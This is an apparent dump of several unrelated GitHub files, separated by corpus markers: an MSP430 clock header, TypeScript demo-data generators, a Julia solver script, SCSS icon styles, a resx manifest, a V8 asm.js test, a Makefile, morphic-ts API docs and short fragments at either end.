core_initcall(cpuidle_init);
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
*
* HAL_UCS.h
* Provides Functions to Initialize the UCS/FLL and clock sources
*
*
* Copyright (C) 2010 Texas Instruments Incorporated - http://www.ti.com/
*
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the
* distribution.
*
* Neither the name of Texas Instruments Incorporated nor the names of
* its contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* Created: Version 1.0 11/24/2009
* Updated: Version 2.0 12/15/2010
* Added Functions: XT2_Stop() and XT1_Stop()
*
******************************************************************************/
#ifndef HAL_UCS_H
#define HAL_UCS_H
#include "HAL_MACROS.h"
/*******************************************************************************
* Macros
******************************************************************************/
/* Select source for FLLREF e.g. SELECT_FLLREF(SELREF__XT1CLK) */
#define SELECT_FLLREF(source) st(UCSCTL3 = (UCSCTL3 & ~(SELREF_7)) | (source);)
/* Select source for ACLK e.g. SELECT_ACLK(SELA__XT1CLK) */
#define SELECT_ACLK(source) st(UCSCTL4 = (UCSCTL4 & ~(SELA_7)) | (source);)
/* Select source for MCLK e.g. SELECT_MCLK(SELM__XT2CLK) */
#define SELECT_MCLK(source) st(UCSCTL4 = (UCSCTL4 & ~(SELM_7)) | (source);)
/* Select source for SMCLK e.g. SELECT_SMCLK(SELS__XT2CLK) */
#define SELECT_SMCLK(source) st(UCSCTL4 = (UCSCTL4 & ~(SELS_7)) | (source);)
/* Select source for MCLK and SMCLK e.g. SELECT_MCLK_SMCLK(SELM__DCOCLK + SELS__DCOCLK) */
#define SELECT_MCLK_SMCLK(sources) st(UCSCTL4 = (UCSCTL4 & ~(SELM_7 + SELS_7)) | (sources);)
/* set ACLK/x */
#define ACLK_DIV(x) st(UCSCTL5 = (UCSCTL5 & ~(DIVA_7)) | (DIVA__##x);)
/* set MCLK/x */
#define MCLK_DIV(x) st(UCSCTL5 = (UCSCTL5 & ~(DIVM_7)) | (DIVM__##x);)
/* set SMCLK/x */
#define SMCLK_DIV(x) st(UCSCTL5 = (UCSCTL5 & ~(DIVS_7)) | (DIVS__##x);)
/* Select divider for FLLREF e.g. SELECT_FLLREFDIV(2) */
#define SELECT_FLLREFDIV(x) st(UCSCTL3 = (UCSCTL3 & ~(FLLREFDIV_7))|(FLLREFDIV__##x);)
/*******************************************************************************
* Defines
******************************************************************************/
#define UCS_STATUS_OK 0
#define UCS_STATUS_ERROR 1
#if 0
/*******************************************************************************
* \brief Startup routine for 32kHz Crystal on LFXT1
*
* \param xtdrive Bits defining the LFXT drive mode after startup
******************************************************************************/
extern void LFXT_Start(unsigned int xtdrive);
#endif
/*******************************************************************************
* \brief Startup routine for 32kHz Crystal on LFXT1 with timeout counter
*
* \param xtdrive Bits defining the LFXT drive mode after startup
* \param timeout Value for the timeout counter
******************************************************************************/
extern unsigned int LFXT_Start_Timeout(unsigned int xtdrive, unsigned int timeout);
#if 0
/*******************************************************************************
* \brief Startup routine for XT1
*
* \param xtdrive Bits defining the XT drive mode
******************************************************************************/
extern void XT1_Start(unsigned int xtdrive);
/*******************************************************************************
* \brief Startup routine for XT1 with timeout counter
*
* \param xtdrive Bits defining the XT drive mode
* \param timeout Value for the timeout counter
******************************************************************************/
extern unsigned int XT1_Start_Timeout(unsigned int xtdrive, unsigned int timeout);
/*******************************************************************************
 * \brief Use XT1 in Bypass mode
******************************************************************************/
extern void XT1_Bypass(void);
#endif
/*******************************************************************************
* \brief Stop XT1 oscillator
******************************************************************************/
extern void XT1_Stop(void);
#if 0
/*******************************************************************************
* \brief Startup routine for XT2
*
* \param xtdrive Bits defining the XT drive mode
******************************************************************************/
extern void XT2_Start(unsigned int xtdrive);
/*******************************************************************************
* \brief Startup routine for XT2 with timeout counter
*
* \param xtdrive Bits defining the XT drive mode
* \param timeout Value for the timeout counter
******************************************************************************/
extern unsigned int XT2_Start_Timeout(unsigned int xtdrive, unsigned int timeout);
/*******************************************************************************
 * \brief Use XT2 in Bypass mode for MCLK
******************************************************************************/
extern void XT2_Bypass(void);
/*******************************************************************************
* \brief Stop XT2 oscillator
******************************************************************************/
extern void XT2_Stop(void);
#endif
/*******************************************************************************
 * \brief Initializes FLL of the UCS and waits till settled before allowing
* code execution to resume. The use of this function is preferred
* over the use of Init_FLL().
*
* \param fsystem Required system frequency (MCLK) in kHz
* \param ratio Ratio between fsystem and FLLREFCLK
******************************************************************************/
extern void Init_FLL_Settle(unsigned int fsystem, unsigned int ratio);
#endif /* HAL_UCS_H */
| {
"pile_set_name": "Github"
} |
interface IRowGenerateData {
id: number;
reportsto: number | null;
available: boolean | null;
firstname: string;
lastname: string;
name: string;
productname: string;
quantity: string | number;
total: string | number;
price: string | number;
date: Date;
}
interface IRowGenerateOrdersData {
id: number | string;
parentid: number | null;
customer: string;
firstname: string;
lastname: string;
name: string;
price: string | number;
quantity: string | number;
total: string | number;
date: Date;
}
export function generateData(rowscount?: number): IRowGenerateData[] {
return generatedata(rowscount);
}
export function generatedata(rowscount?: number, hasNullValues?: boolean): IRowGenerateData[] {
const data: IRowGenerateData[] = new Array();
if (rowscount === undefined) {
rowscount = 100;
}
const firstNames =
[
'Andrew', 'Nancy', 'Shelley', 'Regina', 'Yoshi', 'Antoni', 'Mayumi', 'Ian', 'Peter', 'Lars', 'Petra', 'Martin', 'Sven', 'Elio', 'Beate', 'Cheryl', 'Michael', 'Guylene'
];
const lastNames =
[
'Fuller', 'Davolio', 'Burke', 'Murphy', 'Nagase', 'Saavedra', 'Ohno', 'Devling', 'Wilson', 'Peterson', 'Winkler', 'Bein', 'Petersen', 'Rossi', 'Vileid', 'Saylor', 'Bjorn', 'Nodier'
];
const productNames =
[
'Black Tea', 'Green Tea', 'Caffe Espresso', 'Doubleshot Espresso', 'Caffe Latte', 'White Chocolate Mocha', 'Caramel Latte', 'Caffe Americano', 'Cappuccino', 'Espresso Truffle', 'Espresso con Panna', 'Peppermint Mocha Twist'
];
const priceValues =
[
'2.25', '1.5', '3.0', '3.3', '4.5', '3.6', '3.8', '2.5', '5.0', '1.75', '3.25', '4.0'
];
for (let i = 0; i < rowscount; i++) {
const row = {} as IRowGenerateData;
const productindex = Math.floor(Math.random() * productNames.length);
const price = parseFloat(priceValues[productindex]);
const quantity = 1 + Math.round(Math.random() * 10);
row.id = i;
row.reportsto = Math.floor(Math.random() * firstNames.length);
if (i % Math.floor(Math.random() * firstNames.length) === 0) {
row.reportsto = null;
}
row.available = productindex % 2 === 0;
if (hasNullValues === true) {
if (productindex % 2 !== 0) {
const random = Math.floor(Math.random() * rowscount);
row.available = i % random === 0 ? null : false;
}
}
row.firstname = firstNames[Math.floor(Math.random() * firstNames.length)];
row.lastname = lastNames[Math.floor(Math.random() * lastNames.length)];
row.name = row.firstname + ' ' + row.lastname;
row.productname = productNames[productindex];
row.price = price;
row.quantity = quantity;
row.total = price * quantity;
const date = new Date();
date.setFullYear(2016, Math.floor(Math.random() * 11), Math.floor(Math.random() * 27));
date.setHours(0, 0, 0, 0);
row.date = date;
data[i] = row;
}
return data;
}
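// Generates hierarchical demo data: every top-level order row receives between 1 and 9
// child product rows linked to it through parentid, and the parent's price accumulates
// the children's price * quantity totals.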
export function generateordersdata(rowscount?: number): IRowGenerateOrdersData[] {
// prepare the data
const data: IRowGenerateOrdersData[] = new Array();
if (rowscount === undefined) {
rowscount = 10;
}
const firstNames =
[
'Andrew', 'Nancy', 'Shelley', 'Regina', 'Yoshi', 'Antoni', 'Mayumi', 'Ian', 'Peter', 'Lars', 'Petra', 'Martin', 'Sven', 'Elio', 'Beate', 'Cheryl', 'Michael', 'Guylene'
];
const lastNames =
[
'Fuller', 'Davolio', 'Burke', 'Murphy', 'Nagase', 'Saavedra', 'Ohno', 'Devling', 'Wilson', 'Peterson', 'Winkler', 'Bein', 'Petersen', 'Rossi', 'Vileid', 'Saylor', 'Bjorn', 'Nodier'
];
const productNames =
[
'Black Tea', 'Green Tea', 'Caffe Espresso', 'Doubleshot Espresso', 'Caffe Latte', 'White Chocolate Mocha', 'Caramel Latte', 'Caffe Americano', 'Cappuccino', 'Espresso Truffle', 'Espresso con Panna', 'Peppermint Mocha Twist'
];
const priceValues =
[
'2.25', '1.5', '3.0', '3.3', '4.5', '3.6', '3.8', '2.5', '5.0', '1.75', '3.25', '4.0'
];
const companyNames = ['Dolor Foundation', 'Vivamus Non Lorem LLP', 'Vel Ltd', 'Turpis Incorporated', 'Egestas Nunc PC', 'At Pretium Aliquet Associates', 'Feugiat Inc.', 'Lacus Industries', 'Senectus Et Foundation', 'Sed LLC', 'Maecenas Mi Felis LLC', 'Pede Blandit Ltd', 'Pellentesque Habitant Morbi Institute'
, 'Mollis Vitae Industries', 'Malesuada Vel Convallis LLP', 'Risus Duis Corp.', 'Convallis LLP', 'Lobortis Augue LLC', 'Auctor LLP', 'Neque Inc.', 'Lorem Eu Corporation'];
for (let i = 0; i < rowscount; i++) {
const row = {} as IRowGenerateOrdersData;
row.id = i;
row.parentid = null;
row.name = 'Order ' + i;
row.firstname = firstNames[Math.floor(Math.random() * firstNames.length)];
row.lastname = lastNames[Math.floor(Math.random() * lastNames.length)];
row.customer = companyNames[Math.floor(Math.random() * companyNames.length)];
const date = new Date();
const month = Math.floor(Math.random() * 11);
const day = Math.floor(Math.random() * 27);
date.setFullYear(2016, month, day);
date.setHours(0, 0, 0, 0);
row.date = date;
row.price = '';
row.quantity = '';
data.push(row);
        const subRowsCount = 1 + Math.round(Math.random() * 8);
let t = 0;
for (let j = 0; j < subRowsCount; j++) {
const subRow = {} as IRowGenerateOrdersData;
const productindex = Math.floor(Math.random() * productNames.length);
const price = parseFloat(priceValues[productindex]);
const quantity = 1;
subRow.name = productNames[productindex];
subRow.id = '' + i + '.' + (1 + j);
subRow.parentid = i;
subRow.price = price;
subRow.quantity = 1;
const subDate = new Date();
subDate.setFullYear(2016, month, day);
subDate.setHours(Math.floor(Math.random() * 23), Math.floor(Math.random() * 59), 0, 0);
subRow.date = subDate;
            subRow.firstname = firstNames[Math.floor(Math.random() * firstNames.length)];
            subRow.lastname = lastNames[Math.floor(Math.random() * lastNames.length)];
            subRow.customer = subRow.firstname + ' ' + subRow.lastname;
t += quantity * price;
data.push(subRow);
}
row.price = t;
row.quantity = 1;
}
return data;
} | {
"pile_set_name": "Github"
} |
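# Two-variable mixed complementarity problem: each mapping F[i] is paired with q[i] >= 0,
# so at a solution F[i] >= 0, q[i] >= 0 and F[i] * q[i] == 0 hold for both variables.
# The model is solved twice: once with the default solver and again with the :NLsolve backend.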
a = 10; b = 1; c = [3, 4]
using Complementarity, JuMP
m = MCPModel()
@variable(m, q[1:2] >= 0)
@mapping(m, F[i in 1:2], - (a - c[i] - 2b*q[i] - b*q[i%2+1]) )
@complementarity(m, F, q)
solveMCP(m)
@show result_value.(q)
status = solveMCP(m, solver=:NLsolve)
@show result_value.(q)
| {
"pile_set_name": "Github"
} |
// Copyright Contributors to the Amundsen project.
// SPDX-License-Identifier: Apache-2.0
@import 'variables';
$icon-size: 24px;
$icon-small-size: 16px;
// Icons
// Lookout! When you update one of these, please update the enums on
// ../js/interfaces/Enums.ts
// Map of Database names and icon paths
$data-stores: (
database: '../images/icons/Database.svg',
hive: '../images/icons/logo-hive.svg',
bigquery: '../images/icons/logo-bigquery.svg',
druid: '../images/icons/logo-druid.svg',
presto: '../images/icons/logo-presto.svg',
postgres: '../images/icons/logo-postgres.svg',
redshift: '../images/icons/logo-redshift.svg',
snowflake: '../images/icons/logo-snowflake.svg',
);
// Map of Dashboard names and icon paths
$dashboards: (
dashboard: '../images/icons/dashboard.svg',
mode: '../images/icons/logo-mode.svg',
redash: '../images/icons/logo-redash.svg',
tableau: '../images/icons/logo-tableau.svg',
);
// Map of User names and icon paths
$users: (
users: '../images/icons/users.svg',
);
$check: (
check: '../images/icons/check.svg',
);
// Given a Map of key/value pairs, generates a new class
@mixin iconBackgrounds($map) {
@each $name, $url in $map {
&.icon-#{$name} {
background: transparent url($url) center center / contain no-repeat;
}
}
}
span.icon {
// Generate Icons
@include iconBackgrounds($data-stores);
@include iconBackgrounds($dashboards);
@include iconBackgrounds($users);
@include iconBackgrounds($check);
background-color: $icon-bg;
border: none;
display: inline-block;
height: $icon-size;
margin: auto 16px auto 0;
min-width: $icon-size;
vertical-align: middle;
width: $icon-size;
}
img.icon {
/* DEPRECATED: follow behavior above to generate
icons */
background-color: $icon-bg;
border: none;
height: $icon-size;
margin: -3px 4px -3px 0;
-webkit-mask-repeat: no-repeat;
mask-repeat: no-repeat;
-webkit-mask-size: contain;
mask-size: contain;
min-width: $icon-size;
width: $icon-size;
&.icon-small {
height: $icon-small-size;
-webkit-mask-size: $icon-small-size $icon-small-size;
mask-size: $icon-small-size $icon-small-size;
min-width: $icon-small-size;
width: $icon-small-size;
}
&.icon-color {
background-color: $icon-bg-brand;
}
&.icon-dark {
background-color: $icon-bg-dark;
}
&.icon-alert {
-webkit-mask-image: url('../images/icons/Alert-Triangle.svg');
mask-image: url('../images/icons/Alert-Triangle.svg');
}
&.icon-bookmark {
-webkit-mask-image: url('../images/icons/Favorite.svg');
mask-image: url('../images/icons/Favorite.svg');
}
&.icon-bookmark-filled {
-webkit-mask-image: url('../images/icons/Favorite-Filled.svg');
mask-image: url('../images/icons/Favorite-Filled.svg');
}
&.icon-delete {
-webkit-mask-image: url('../images/icons/Trash.svg');
mask-image: url('../images/icons/Trash.svg');
}
&.icon-red-triangle-warning {
-webkit-mask-image: url('../images/icons/DataQualityWarning.svg');
mask-image: url('../images/icons/DataQualityWarning.svg');
}
&.icon-down {
-webkit-mask-image: url('../images/icons/Down.svg');
mask-image: url('../images/icons/Down.svg');
}
&.icon-edit {
-webkit-mask-image: url('../images/icons/Edit.svg');
mask-image: url('../images/icons/Edit.svg');
}
&.icon-help {
-webkit-mask-image: url('../images/icons/Help-Circle.svg');
mask-image: url('../images/icons/Help-Circle.svg');
}
&.icon-github {
-webkit-mask-image: url('../images/icons/github.svg');
mask-image: url('../images/icons/github.svg');
}
&.icon-left {
-webkit-mask-image: url('../images/icons/Left.svg');
mask-image: url('../images/icons/Left.svg');
}
&.icon-loading {
-webkit-mask-image: url('../images/icons/Loader.svg');
mask-image: url('../images/icons/Loader.svg');
}
&.icon-mail {
-webkit-mask-image: url('../images/icons/mail.svg');
mask-image: url('../images/icons/mail.svg');
}
&.icon-plus {
-webkit-mask-image: url('../images/icons/plus.svg');
mask-image: url('../images/icons/plus.svg');
}
&.icon-plus-circle {
-webkit-mask-image: url('../images/icons/Plus-Circle.svg');
mask-image: url('../images/icons/Plus-Circle.svg');
}
&.icon-preview {
-webkit-mask-image: url('../images/icons/Preview.svg');
mask-image: url('../images/icons/Preview.svg');
}
&.icon-refresh {
-webkit-mask-image: url('../images/icons/Refresh-cw.svg');
mask-image: url('../images/icons/Refresh-cw.svg');
}
&.icon-right {
-webkit-mask-image: url('../images/icons/Right.svg');
mask-image: url('../images/icons/Right.svg');
}
&.icon-search {
-webkit-mask-image: url('../images/icons/Search.svg');
mask-image: url('../images/icons/Search.svg');
}
&.icon-send {
-webkit-mask-image: url('../images/icons/Send.svg');
mask-image: url('../images/icons/Send.svg');
}
&.icon-slack {
-webkit-mask-image: url('../images/icons/slack.svg');
mask-image: url('../images/icons/slack.svg');
}
&.icon-up {
-webkit-mask-image: url('../images/icons/Up.svg');
mask-image: url('../images/icons/Up.svg');
}
&.icon-user {
-webkit-mask-image: url('../images/icons/users.svg');
mask-image: url('../images/icons/users.svg');
}
&.icon-more {
-webkit-mask-image: url('../images/icons/More.svg');
mask-image: url('../images/icons/More.svg');
}
}
.disabled,
:disabled {
> img.icon,
> img.icon.icon-color {
background-color: $icon-bg-disabled;
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
    The primary goal of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
<data name="abp_js" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\abp.js.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="mgwz_dll" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\mgwz.dll.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="minimize" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\minimize.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="option" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\option.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="pac_txt" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\pac.txt.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="privoxy_conf" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\privoxy_conf.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;gb2312</value>
</data>
<data name="privoxy_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\privoxy.exe.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="restart" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\restart.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="server" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\server.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="sysproxy64_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\sysproxy64.exe.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="sysproxy_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\sysproxy.exe.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
</root> | {
"pile_set_name": "Github"
} |
// Copyright 2017 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
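// The module follows the asm.js pattern (typed heap view + "use asm"). The heap passed in
// below ends up as a zero-length ArrayBuffer, so the Float64Array store is silently dropped
// and reading MEM64[0] back yields NaN, which the assertion expects.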
function Module(stdlib, foreign, heap) {
"use asm";
var MEM64 = new stdlib.Float64Array(heap);
function foo(i) {
i = i | 0;
MEM64[032 ] = +(i >>> 7 ) / 2.;
return +MEM64[0];
}
return { foo: foo };
}
var foo = Module(this, {}, new ArrayBuffer( "" ? this : this)).foo;
assertEquals(NaN, foo(1));
| {
"pile_set_name": "Github"
} |
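# "make train" installs dependencies and starts training; "clean_build" removes the *ubyte
# data files, node_modules and package-lock.json, while "clean" additionally deletes the
# saved model (model.json and weights.bin).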
train:
npm install
npm start
clean_build:
rm -f *ubyte
rm -rf node_modules
rm -f package-lock.json
clean:
rm -f *ubyte
rm -rf node_modules
rm -f package-lock.json
rm -f model.json
rm -f weights.bin
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Aurora.Profiles.LeagueOfLegends.GSI.Nodes
{
public class AbilitiesNode : Node
{
public AbilityNode Q = new AbilityNode();
public AbilityNode W = new AbilityNode();
public AbilityNode E = new AbilityNode();
public AbilityNode R = new AbilityNode();
//TODO: if there is anything useful for the passive later, add it here
}
}
| {
"pile_set_name": "Github"
} |
@inherits Nancy.ViewEngines.Razor.NancyRazorViewBase<dynamic>
Hello @ViewBag.Name
@Html.Partial("_PartialTest.cshtml") | {
"pile_set_name": "Github"
} |
---
title: object.ts
nav_order: 4
parent: Modules
---
---
<h2 class="text-delta">Table of contents</h2>
- [ModelAlgebraObject (interface)](#modelalgebraobject-interface)
- [ModelAlgebraObject1 (interface)](#modelalgebraobject1-interface)
- [ModelAlgebraObject2 (interface)](#modelalgebraobject2-interface)
- [ObjectURI (type alias)](#objecturi-type-alias)
- [PropsKind1 (type alias)](#propskind1-type-alias)
- [PropsKind2 (type alias)](#propskind2-type-alias)
- [ObjectURI (constant)](#objecturi-constant)
---
# ModelAlgebraObject (interface)
**Signature**
```ts
export interface ModelAlgebraObject<F, Env> {
_F: F
interface: {
<Props extends AnyMProps<F>>(
props: Props,
name: string,
config?: ConfigsForType<Env, { [k in keyof Props]: Props[k]['_E'] }, { [k in keyof Props]: Props[k]['_A'] }>
): HKT2<F, Env, { [k in keyof Props]: Props[k]['_E'] }, { [k in keyof Props]: Props[k]['_A'] }>
}
partial: {
<Props extends AnyMProps<F>>(
props: Props,
name: string,
config?: ConfigsForType<
Env,
Partial<{ [k in keyof Props]: Props[k]['_E'] }>,
Partial<{ [k in keyof Props]: Props[k]['_A'] }>
>
): HKT2<F, Env, Partial<{ [k in keyof Props]: Props[k]['_E'] }>, Partial<{ [k in keyof Props]: Props[k]['_A'] }>>
}
both: {
<Props extends AnyMProps<F>, PProps extends AnyMProps<F>>(
props: Props,
partial: PProps,
name: string,
config?: ConfigsForType<
Env,
{ [k in keyof Props]: Props[k]['_E'] } & Partial<{ [k in keyof PProps]: PProps[k]['_E'] }>,
{ [k in keyof Props]: Props[k]['_A'] } & Partial<{ [k in keyof PProps]: PProps[k]['_A'] }>
>
): HKT2<
F,
Env,
{ [k in keyof Props]: Props[k]['_E'] } & Partial<{ [k in keyof PProps]: PProps[k]['_E'] }>,
{ [k in keyof Props]: Props[k]['_A'] } & Partial<{ [k in keyof PProps]: PProps[k]['_A'] }>
>
}
}
```
Added in v0.0.1
# ModelAlgebraObject1 (interface)
**Signature**
```ts
export interface ModelAlgebraObject1<F extends URIS, Env extends AnyEnv> {
_F: F
interface: <Props>(
props: PropsKind1<F, Props, Env>,
name: string,
config?: ConfigsForType<Env, unknown, Props>
) => Kind<F, Env, Props>
partial: <Props>(
props: PropsKind1<F, Props, Env>,
name: string,
config?: ConfigsForType<Env, unknown, Partial<Props>>
) => Kind<F, Env, Partial<Props>>
both: <Props, PProps>(
props: PropsKind1<F, Props, Env>,
partial: PropsKind1<F, PProps, Env>,
name: string,
config?: ConfigsForType<Env, unknown, Props & Partial<PProps>>
) => Kind<F, Env, Props & Partial<PProps>>
}
```
Added in v0.0.1
# ModelAlgebraObject2 (interface)
**Signature**
```ts
export interface ModelAlgebraObject2<F extends URIS2, Env extends AnyEnv> {
_F: F
interface: <PropsE, PropsA>(
props: PropsKind2<F, PropsE, PropsA, Env>,
name: string,
config?: ConfigsForType<Env, PropsE, PropsA>
) => Kind2<F, Env, PropsE, PropsA>
partial: <PropsE, PropsA>(
props: PropsKind2<F, PropsE, PropsA, Env>,
name: string,
config?: ConfigsForType<Env, Partial<PropsE>, Partial<PropsA>>
) => Kind2<F, Env, Partial<PropsE>, Partial<PropsA>>
both: <PropsE, PPropsE, PropsA, PPropsA>(
props: PropsKind2<F, PropsE, PropsA, Env>,
partial: PropsKind2<F, PPropsE, PPropsA, Env>,
name: string,
config?: ConfigsForType<Env, PropsE & Partial<PPropsE>, PropsA & Partial<PPropsA>>
) => Kind2<F, Env, PropsE & Partial<PPropsE>, PropsA & Partial<PPropsA>>
}
```
Added in v0.0.1
# ObjectURI (type alias)
**Signature**
```ts
export type ObjectURI = typeof ObjectURI
```
Added in v0.0.1
# PropsKind1 (type alias)
**Signature**
```ts
export type PropsKind1<F extends URIS, PropsA, R> = { [k in keyof PropsA]: Kind<F, R, PropsA[k]> }
```
Added in v0.0.1
# PropsKind2 (type alias)
**Signature**
```ts
export type PropsKind2<F extends URIS2, PropsA, PropsE, R> = {
[k in keyof PropsA & keyof PropsE]: Kind2<F, R, PropsA[k], PropsE[k]>
}
```
Added in v0.0.1
# ObjectURI (constant)
**Signature**
```ts
export const ObjectURI: "ObjectURI" = ...
```
Added in v0.0.1
| {
"pile_set_name": "Github"
} |
//
// Debounce.swift
// RxSwift
//
